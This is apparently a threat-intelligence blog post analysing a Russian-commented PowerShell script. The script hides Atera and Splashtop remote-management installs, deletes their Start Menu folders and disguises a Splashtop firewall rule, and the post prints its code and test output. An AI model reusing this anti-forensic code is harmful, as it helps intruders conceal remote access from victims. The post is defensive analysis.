Removing Traces of RMM Tools

Table of Contents


Fox_threatintel tweeted recently about an open directory on I downloaded all the files from this directory and stumbled upon a ‘cleaner’ script, which we will examine in this short blog post. The original script is available on VirusTotal.

Tweet from Fox_threatintel

Figure 1: Tweet from Fox_threatintel

Find installed software

First, the script defines an array ($uninstallKeys), holding two registry keys:

$uninstallKeys = @(

In our case, the script explicitly searches for the RMM products Atera and Splashtop:

$softwareNamesToFind = @("AteraAgent", "Splashtop Streamer")

The script then iterates over the values in the two registry keys, searching for names within the defined array $softwareNamesToFind (Atera and Splashtop, see above):

foreach ($uninstallKey in $uninstallKeys) {
    Get-ChildItem -Path $uninstallKey | ForEach-Object {
        $displayName = (Get-ItemProperty -Path $_.PSPath).DisplayName
        foreach ($softwareName in $softwareNamesToFind) {
            if ($displayName -eq $softwareName) {
                Write-Host "$softwareName найден в $_.PSPath"
                $foundSoftwareKeys += $_.PSPath

If the script finds an installed Atera or Splashtop installation, the value “SystemComponent” is set to 1 within the registry key, which “hides” the entry from the graphical interface (Apps & features) and might fool some tools.

foreach ($softwareKeyPath in $foundSoftwareKeys) {
    Write-Host "Установка значения SystemComponent в 1 для $softwareKeyPath"
    Set-ItemProperty -Path $softwareKeyPath -Name "SystemComponent" -Value 1 -Type DWORD

Removing folders

After “hiding” two possible entries from the Installation / Uninstallation menu, the script next tries to clean up installation folders:

$foldersToDelete = @(
    "Anydesk Custom Client",
    "Splashtop Remote"

The code recursively traverses through the “Start Menu” and the ProgramData folder, taking notes of every item within a folder marked to delete (see above, the array $foldersToDelete). The items within the folders and the files themselves are removed with the PowerShell command Remove-Item.

$startMenuPath = "$env:APPDATA\Microsoft\Windows\Start Menu\Programs"
$programDataPath = "$env:ProgramData\Microsoft\Windows\Start Menu\Programs"

foreach ($folderName in $foldersToDelete) {
    $startMenuItems = Get-ChildItem -Path "$startMenuPath" -Filter $folderName -Recurse
    $programDataItems = Get-ChildItem -Path "$programDataPath" -Filter $folderName -Recurse

    foreach ($item in $startMenuItems) {
        Remove-Item -Path $item.FullName -Force -Recurse
        Write-Host "Удалена папка $($item.Name) из папки AppData."

    foreach ($item in $programDataItems) {
        Remove-Item -Path $item.FullName -Force -Recurse
        Write-Host "Удалена папка $($item.Name) из папки ProgramData."

Remove traces in the Firewall Rules

Last, the script changes the name of the Splashtop firewall rule with the command Set-NetFirewallRule. The comment inside the code reads, translated from Russian to English: Change the name and description of the rule to “Cast to Device streaming server (HTTP-Streaming-In):

$splashtopRuleName = Get-NetFirewallRule | Where-Object { $_.DisplayName -like "*Splashtop*" } | Select-Object -ExpandProperty Name

# Изменить название и описание правила на "Cast to Device streaming server (HTTP-Streaming-In)"
if ($splashtopRuleName) {
    Set-NetFirewallRule -Name $splashtopRuleName -NewDisplayName "Cast to Device streaming server (HTTP-Streaming-In)" -Description "Inbound rule for the Cast to Device server to allow streaming using HTTP. [TCP 10247]"
    Write-Host "Название и описание правила брандмауэра для Splashtop Streamer изменены."
} else {
    Write-Host "Правило брандмауэра для Splashtop Streamer не найдено."


I installed Splashtop Streamer on a test machine and ran the PowerShell code. I received the following output:

Splashtop Streamer найден в HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{B7C5EA94-B96A-41F5-BE95-25D78B486678}.PS
Установка значения SystemComponent в 1 для Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\
Удалена папка Splashtop Remote из папки ProgramData.
Название и описание правила брандмауэра для Splashtop Streamer изменены. 

Here is the translated version:

Splashtop Streamer found in HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{B7C5EA94-B96A-41F5-BE95-25D78B486678}.PS
Setting the SystemComponent value to 1 for Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\
Removed Splashtop Remote folder from the ProgramData folder.
The name and description of the firewall rule for Splashtop Streamer have been changed. 

Indeed, Splashtop is no longer visible in the App & features window. However, by toggling the SystemComponent back to 0, the entry becomes visible again.

Apps & Features

Figure 2: Apps & Features

And yes, also, the firewall rule has changed - but the App is still a giveaway, pointing to Splashtop :)

Adjusted Firewall rule

Figure 3: Adjusted Firewall rule


Honestly, I have no idea who came up with this script and thinks it covers enough tracks. Under certain circumstances, ordinary users could be fooled, making them believe that no RMM software was installed on their computers. However, we could consult various other forensic artifacts to find out what software was installed or running on computers or servers, so that these small changes would make little difference here.